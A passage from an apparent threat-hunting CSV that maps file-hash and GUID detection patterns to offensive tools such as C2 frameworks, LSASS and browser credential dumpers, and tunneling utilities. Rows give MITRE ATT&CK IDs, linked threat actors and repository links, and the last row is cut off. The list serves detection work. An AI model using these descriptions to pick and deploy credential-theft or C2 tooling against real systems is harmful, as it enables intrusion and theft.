"*48a61f194676d3b3f1aef3410eabda1ab57448f1966a91a2d1be5af02a2c77c8*",".{0,1000}48a61f194676d3b3f1aef3410eabda1ab57448f1966a91a2d1be5af02a2c77c8.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","#filehash","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","25941" "*48a7984aefe898990b83d8d8ed16f8e8116288fd7531affa4726b262ba3e682c*",".{0,1000}48a7984aefe898990b83d8d8ed16f8e8116288fd7531affa4726b262ba3e682c.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","25942" "*48a7ca531d14b205dfcaaa59b86e78f3f092a2c1c6ccf8c827ee87ba30d3108c*",".{0,1000}48a7ca531d14b205dfcaaa59b86e78f3f092a2c1c6ccf8c827ee87ba30d3108c.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#filehash #linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","25943" "*48a968cb02b5e5ebbb4e3b62b2261f7b997c13f6861404968f35997b31d70643*",".{0,1000}48a968cb02b5e5ebbb4e3b62b2261f7b997c13f6861404968f35997b31d70643.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","25944" "*48b5eeaaaca67edea0fea3c13d20e7e536ed0205b3b39b9afaf3ef251cfa16e7*",".{0,1000}48b5eeaaaca67edea0fea3c13d20e7e536ed0205b3b39b9afaf3ef251cfa16e7.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","25946" "*48b7e423f61b11878891dd7005b2b2ba88f997d4501c405fb9c69f932499ee74*",".{0,1000}48b7e423f61b11878891dd7005b2b2ba88f997d4501c405fb9c69f932499ee74.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","25947" "*48bbbde23d4a33619295aedd90361d246d1edf1082ba361a54b84b706304ef1e*",".{0,1000}48bbbde23d4a33619295aedd90361d246d1edf1082ba361a54b84b706304ef1e.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","25948" 
"*48be356e1719a3dc5c38db4463716ca90a21530266e657b1775b67c7ac25f922*",".{0,1000}48be356e1719a3dc5c38db4463716ca90a21530266e657b1775b67c7ac25f922.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","25949" "*48bf95a01c16f6af2c577d1e1df7e53225edbbfc2014b2ecec5f939e31a6c576*",".{0,1000}48bf95a01c16f6af2c577d1e1df7e53225edbbfc2014b2ecec5f939e31a6c576.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","25950" "*48c4df943d19bc547c6cab3a3c802dbcf13af3b7880b3977aef74f452c831a95*",".{0,1000}48c4df943d19bc547c6cab3a3c802dbcf13af3b7880b3977aef74f452c831a95.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","0","#filehash #linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","25952" "*48c54a40a96fbfbbbd4b6f7c095e1eaa9f3ff33faa096fabb7f5ff04a6af4e5a*",".{0,1000}48c54a40a96fbfbbbd4b6f7c095e1eaa9f3ff33faa096fabb7f5ff04a6af4e5a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25953" 
"*48ca254a725d1c4b6422cde2faa8777559f1513bc9bc032f05ee433be8b5fc55*",".{0,1000}48ca254a725d1c4b6422cde2faa8777559f1513bc9bc032f05ee433be8b5fc55.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25954" "*48caf6ffe4985e7541b9d34e8b6946d8c99e9d87cb46d146c81029fa280c03ba*",".{0,1000}48caf6ffe4985e7541b9d34e8b6946d8c99e9d87cb46d146c81029fa280c03ba.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25956" "*48cc9ab2452b8bb8a9230f2a70a9b9e74a9307f9a0792cadb76c042f8b93e1bc*",".{0,1000}48cc9ab2452b8bb8a9230f2a70a9b9e74a9307f9a0792cadb76c042f8b93e1bc.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25957" 
"*48dd94df199f63a06b571290ca42e17488f7053605449341eb9747807a26aa10*",".{0,1000}48dd94df199f63a06b571290ca42e17488f7053605449341eb9747807a26aa10.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","#filehash","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","25958" "*48e14cff5c1fbf0bdd959c1d8f6dad4d6b38aebc29ef8210fd0ac7156b67b468*",".{0,1000}48e14cff5c1fbf0bdd959c1d8f6dad4d6b38aebc29ef8210fd0ac7156b67b468.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","25960" "*48f3f5cf9a7cfae9b9a5efc36f0af92513bef873e49afcb0bf234d97bad7b951*",".{0,1000}48f3f5cf9a7cfae9b9a5efc36f0af92513bef873e49afcb0bf234d97bad7b951.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25962" "*48f5813a8aedad134e9d5d3ee4be23f50f2cdc98b43d46f86913e2d1d34bd276*",".{0,1000}48f5813a8aedad134e9d5d3ee4be23f50f2cdc98b43d46f86913e2d1d34bd276.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & 
Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","25963" "*48f6c28eb0f6be7a624095e620820e21cabb7008c14beee1210d930aa3d9ffb6*",".{0,1000}48f6c28eb0f6be7a624095e620820e21cabb7008c14beee1210d930aa3d9ffb6.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","25964" "*48f877f4424e0357e506fb65e0b673e495a092c3e1a2b0a010451defbb46c817*",".{0,1000}48f877f4424e0357e506fb65e0b673e495a092c3e1a2b0a010451defbb46c817.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25965" "*48fa7261a91c16d1d37f13b483677729ee83cac7c90633cad4e1142eb41aa1d0*",".{0,1000}48fa7261a91c16d1d37f13b483677729ee83cac7c90633cad4e1142eb41aa1d0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25966" "*48fcb3ac5d2ca4147cb46d18b662bc25262988a105fd8c93212297a07af3d615*",".{0,1000}48fcb3ac5d2ca4147cb46d18b662bc25262988a105fd8c93212297a07af3d615.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","25968" "*48fdbb3b4880b7cfeac74fa40d699f0cee12ffa0d7d2ad1eed7af09ec341b24e*",".{0,1000}48fdbb3b4880b7cfeac74fa40d699f0cee12ffa0d7d2ad1eed7af09ec341b24e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25969" "*490139a7800992202ca46d3a69882b476014126fc3ed4143c184bcd7f76a5761*",".{0,1000}490139a7800992202ca46d3a69882b476014126fc3ed4143c184bcd7f76a5761.{0,1000}","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. 
Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle - GOBLIN PANDA - Loki","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","25970" "*4909f675efb667170fdc1fb04417a959d2f016eb7aa8fc6a41731788bad91c27*",".{0,1000}4909f675efb667170fdc1fb04417a959d2f016eb7aa8fc6a41731788bad91c27.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25971" "*491012428e225b620985e8fc2af087fe8b85ccd9c9cc0a37bd1385b62f317bbe*",".{0,1000}491012428e225b620985e8fc2af087fe8b85ccd9c9cc0a37bd1385b62f317bbe.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","#filehash","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","25972" "*491919ffbf3bf3ba309a98d7dce8c3b04e4f269faedd59f57ec1943efe668254*",".{0,1000}491919ffbf3bf3ba309a98d7dce8c3b04e4f269faedd59f57ec1943efe668254.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A","25974" 
"*491d380503b718a363fa4ecc7385c501b12d15369b4a23e55f7fec9306bfb716*",".{0,1000}491d380503b718a363fa4ecc7385c501b12d15369b4a23e55f7fec9306bfb716.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25977" "*49340cc563c7fa1b0ee0aa45f9ef1ec227713e1bc56f9c184af0323e425119c1*",".{0,1000}49340cc563c7fa1b0ee0aa45f9ef1ec227713e1bc56f9c184af0323e425119c1.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","#filehash","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","25980" "*493e415ef774fe3a7c3ba17a524f02d72bd36b1a49d8e9e0734eecf1d5834155*",".{0,1000}493e415ef774fe3a7c3ba17a524f02d72bd36b1a49d8e9e0734eecf1d5834155.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","25981" "*494072da9b54381c4b40e55e6131db414797d450b562a67c45168fb3bb46a07c*",".{0,1000}494072da9b54381c4b40e55e6131db414797d450b562a67c45168fb3bb46a07c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25982" "*494dd15c32c3fe9a43edefb8ae35752f2e596d609a358e4ea1e7b9b4eba8e542*",".{0,1000}494dd15c32c3fe9a43edefb8ae35752f2e596d609a358e4ea1e7b9b4eba8e542.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","25983" "*4955d7e8fc3d3ded8e3b95757c78b3c4cd969b5fbb92a65267e6141b8faa83d5*",".{0,1000}4955d7e8fc3d3ded8e3b95757c78b3c4cd969b5fbb92a65267e6141b8faa83d5.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","0","#filehash","N/A","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","25984" "*4957a3e8d46d84698c5987e2c45bc2705865ac8cf742218c574de4cee69da080*",".{0,1000}4957a3e8d46d84698c5987e2c45bc2705865ac8cf742218c574de4cee69da080.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to 
create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","#filehash","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","25985" "*4962402d7407375db7e69c2d731aec97649668214c27c82b46971733a902ac0b*",".{0,1000}4962402d7407375db7e69c2d731aec97649668214c27c82b46971733a902ac0b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25986" "*49656d058f63398c98cff95a5bbe76a6911e003ddb7baea082a7e7752525d6a6*",".{0,1000}49656d058f63398c98cff95a5bbe76a6911e003ddb7baea082a7e7752525d6a6.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","#filehash","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","25987" "*49693e06c8e70eabe6a5e3cf8b1624e07462fc0cbb01f1bce18b75af8534c7e1*",".{0,1000}49693e06c8e70eabe6a5e3cf8b1624e07462fc0cbb01f1bce18b75af8534c7e1.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 
- T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","25988" "*4969b09ab7cae1ba1f02a509b9b7099195fab22321b73039fcce92e9974d7b93*",".{0,1000}4969b09ab7cae1ba1f02a509b9b7099195fab22321b73039fcce92e9974d7b93.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#filehash","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","25989" "*497a4330455b6f5e625f1d9d7dd92f5c93f8258821b4c26abd142813f8873208*",".{0,1000}497a4330455b6f5e625f1d9d7dd92f5c93f8258821b4c26abd142813f8873208.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25991" "*497aafd68507c783dbc1ce2074f2d4de8be022f635533d896ac18b5451e355f3*",".{0,1000}497aafd68507c783dbc1ce2074f2d4de8be022f635533d896ac18b5451e355f3.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","25992" 
"*497CA37F-506C-46CD-9B8D-F9BB0DA34B95*",".{0,1000}497CA37F\-506C\-46CD\-9B8D\-F9BB0DA34B95.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","#GUIDproject","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","25993" "*4980fe8b5f9539b07e8f8ab36c13672558741048872fb2d983adca48c567e193*",".{0,1000}4980fe8b5f9539b07e8f8ab36c13672558741048872fb2d983adca48c567e193.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25994" "*498364537cd2ea03d847b0254255a4e8c2bddc8e27c9dbb901d38dc1f954d99a*",".{0,1000}498364537cd2ea03d847b0254255a4e8c2bddc8e27c9dbb901d38dc1f954d99a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25996" "*4984f4ee968fc246b4df6e9d6552753a98e4762c8cc95cd9693ffa815479d8f7*",".{0,1000}4984f4ee968fc246b4df6e9d6552753a98e4762c8cc95cd9693ffa815479d8f7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25997" "*49966f985d0d509cebebda87d56da72e6a94253adfb3252000dfff73fb207ff0*",".{0,1000}49966f985d0d509cebebda87d56da72e6a94253adfb3252000dfff73fb207ff0.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","#filehash","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","25999" "*499aded3a5f4ad62112d592128c245a7f38d841475428df10b9dded5291fc926*",".{0,1000}499aded3a5f4ad62112d592128c245a7f38d841475428df10b9dded5291fc926.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","26000" "*49a2c7f9b752b7592cb1726d5427c81cb54e4055ef8350226dbb46a32d8fd560*",".{0,1000}49a2c7f9b752b7592cb1726d5427c81cb54e4055ef8350226dbb46a32d8fd560.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","26002" "*49a3e7cc6f7f1a31d5b77a8772ffdc6c25eb1ce35fa0c3de6e55149494496491*",".{0,1000}49a3e7cc6f7f1a31d5b77a8772ffdc6c25eb1ce35fa0c3de6e55149494496491.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26003" "*49AD5F38-9E37-4967-9E84-FE19C7434ED7*",".{0,1000}49AD5F38\-9E37\-4967\-9E84\-FE19C7434ED7.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs - detect various 